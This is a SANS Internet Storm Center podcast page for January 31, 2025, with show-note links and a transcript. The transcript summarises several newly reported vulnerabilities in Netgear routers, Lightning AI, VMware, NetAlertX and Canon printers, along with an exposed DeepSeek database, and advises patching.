Handler on Duty: Jim Clausing
Threat Level: green
Podcast Detail
SANS ISC Stormcast Jan 31st 2025: Old Netgear Vuln in Depth; Lightning AI RCE; Canon Printer RCE; Deepseek Leak;
If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9304.mp3
My Next Class
| Network Monitoring and Threat Detection In-Depth | Baltimore | Mar 3rd - Mar 8th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | Orlando | Apr 13th - Apr 18th 2025 |
PCAPs or It Didn't Happen: Exposing an Old Netgear Vulnerability Still Active in 2025 [Guest Diary]
https://isc.sans.edu/diary/PCAPs%20or%20It%20Didn%27t%20Happen%3A%20Exposing%20an%20Old%20Netgear%20Vulnerability%20Still%20Active%20in%202025%20%5BGuest%20Diary%5D/31638
RCE Vulnerablity in AI Development Platform Lightning AI
Noma Security discovered a neat remote code execution vulnerability in Lightning AI. This vulnerability is exploitable by tricking a logged in user into clicking a simple link.
https://noma.security/noma-research-discovers-rce-vulnerability-in-ai-development-platform-lightning-ai/
Canon Laser Printers and Small Office Multifunctional Printer Vulnerabilities
Canon fixed three different vulnerablities affecting various laser and small office multifunctional printers. These vulnerabilities may lead to remote code execution, and there are some interesting exploit opportunities
https://www.usa.canon.com/support/canon-product-advisories/service-notice-regarding-vulnerability-measure-against-buffer-overflow-for-laser-printers-and-small-office-multifunctional-printers
Deepseek ClickHouse Database Leak
https://www.wiz.io/blog/wiz-research-uncovers-exposed-deepseek-database-leak
iTunes
MP3 Download
RSS Feed
Google
Podbean
Amazon Echo
YouTube
Spreaker
Spotify
Discussion
New Discussions closed for all Podcasts older than two(2) weeks
Please send your comments to our Contact Form
| Network Monitoring and Threat Detection In-Depth | Baltimore | Mar 3rd - Mar 8th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | Orlando | Apr 13th - Apr 18th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | San Diego | May 5th - May 10th 2025 |
| Network Monitoring and Threat Detection In-Depth | Baltimore | Jun 2nd - Jun 7th 2025 |
| Application Security: Securing Web Apps, APIs, and Microservices | Washington | Jul 14th - Jul 19th 2025 |
Podcast Transcript
Hello and welcome to the Friday, January 31st, 2025 edition of the SANS Internet Storm Center's Stormcast. My edition of the SSANS Internet Storm Center's Stormcast. My edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich and today I'm recording from Jacksonville, Florida. In today's diaries we have a deep dive by David Watson, one of our undergraduate interns, into an older Netgear vulnerability, good old DGN 2200 V1 and DGN 1000 versions. These routers are no longer supported but what's always surprising is how many attacks we're seeing for these particular vulnerabilities. So David took a closer look and actually did a real nice deep dive into these vulnerabilities, how they exactly work and how they are being exploited. Real neat here, even though the vulnerability itself of course is well known, still it's out there and a good reminder. Keep patching your routers, as I always say, once a month. Put a note in your calendar, check if your router firmware is up to date. And yes, the real big problem here is that some of these devices are end of life and that's sometimes actually real difficult to detect or even realize that your device no longer receives any updates. That's hopefully one of the things that this new cybersecurity label that's supposed to come out is going to fix because it's part of that specification. Routers are supposed to provide basically some kind of end of life date and indicator when the router will no longer be updated. And VMware patched five different vulnerabilities in VMware area operations as well as area operations for logs. The CVE numbers of some of them may be a little bit on the low side. In particular, one that's a broken access control vulnerability that does allow a normal user to execute commands as an administrator. Only has a 4.3. The highest CVSS score actually here is an information disclosure vulnerability. And that has a CVSS score of 8.5. Would certainly recommend patching it given some of the history with attackers targeting some of these VMware products. But at this point, there is no known exploit available. And the vulnerability was reported internally. So it's not already being exploited. And yes, we also have vulnerable security tools again. And this time, it's at least not the big enterprise one, but an open source one. So I'll give them a little bit of a pass here. NetAlert X suffers from an unauthenticated remote code execution vulnerability. This particular tool is often used as a Wi-Fi intrusion detection system. So trying to figure out users that are scanning or trying to penetrate your Wi-Fi network. There are lots of details available about this vulnerability. So it's certainly exploitable. No exploit seen in the while yet as far as I'm aware of. It also comes with an unauthenticated file read vulnerability that's being leveraged here. Definitely something that you do want to patch in particular given that this particular product is somewhat exposed in its role as a wireless IDS. And Canon released an update for its laser printers and small office multifunction printers fixing three different vulnerabilities with a CVS score of 9.8. Some of them leading to unauthenticated remote code execution. What does save the day here a little bit is that this is not necessarily something that's easily exploited sort of remotely. These printers are typically not exposed to the internet. So interesting vulnerabilities, however, like for example, in TIFF data EXIF tag processing. I could see where maybe it's being exploited by tricking the victim into printing a malicious document. Have to look a little bit closer at some of these vulnerabilities. But I think there are some neat sort of unique exploit opportunities here with these vulnerabilities. And well, then in closing, we do have an other AI related story, but it's really more a story about if you're developing new tools, you still have to worry about old vulnerabilities. And well, essentially, good old known best practices. With research uncovered and exposed DeepSeq database. DeepSeq, of course, has caused a lot of news this week. In this particular case, there is a ClickHouse database. ClickHouse being one of those NoSQL style databases. It's an open source database that they left completely exposed. And this database apparently was used to also store users' chat history. So essentially prior queries to DeepSeq and lots of additional details were able to be recovered from this database. This is really a flaw that's not at all related to AI. It's something that we had for years and years with similar database, whether it's MongoDB, whether it's S3 buckets, it's all the same thing. Don't leave your crap exposed to the internet. And with that, thanks again for listening and talk to you again on Monday. Bye.
Follow the Internet Storm Center on Twitter
© 2025 SANS™ Internet Storm Center
Developers: We have an API for you! 